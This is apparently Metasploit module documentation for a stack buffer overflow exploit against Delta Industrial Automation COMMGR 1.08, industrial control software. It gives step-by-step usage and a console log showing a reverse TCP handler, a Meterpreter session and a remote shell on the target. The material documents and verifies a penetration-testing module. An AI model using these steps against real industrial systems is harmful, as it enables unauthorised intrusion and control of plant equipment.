## Vulnerable Application

Delta Electronics Delta Industrial Automation COMMGR 1.08 is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code. This module has been tested successfully on Windows XP SP3, Windows 7 SP1, and Windows 8.1. The vulnerable application is available for download at http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=7763&DocPath=1&hl=en-US.

## Verification Steps

  1. Install Delta Industrial Automation COMMGR 1.08
  2. Start ```msfconsole```
  3. Do ```use exploit/windows/scada/delta_ia_commgr_bof```
  4. Do ```set RHOST <target_ip>```
  5. Do ```run```
  6. You should get a shell. :)

## Scenarios

### Delta Industrial Automation COMMGR 1.08 on Windows 7 SP1

```
msf > use exploit/windows/scada/delta_ia_commgr_bof
msf exploit(windows/scada/delta_ia_commgr_bof) > show options

Module options (exploit/windows/scada/delta_ia_commgr_bof):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  502              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   COMMGR 1.08 / Windows Universal


msf exploit(windows/scada/delta_ia_commgr_bof) > set RHOST 192.168.3.64
RHOST => 192.168.3.64
msf exploit(windows/scada/delta_ia_commgr_bof) > run

[*] Started reverse TCP handler on 192.168.3.150:4444
[*] 192.168.3.64:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes...
[*] Sending stage (179779 bytes) to 192.168.3.64
[*] Meterpreter session 1 opened (192.168.3.150:4444 -> 192.168.3.64:49170) at 2018-09-18 23:38:51 -0700

meterpreter > sysinfo
Computer        : TEST01
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > shell
Process 932 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Delta Industrial Automation\COMMGR 1.08>exit
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.3.64 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(windows/scada/delta_ia_commgr_bof) >
```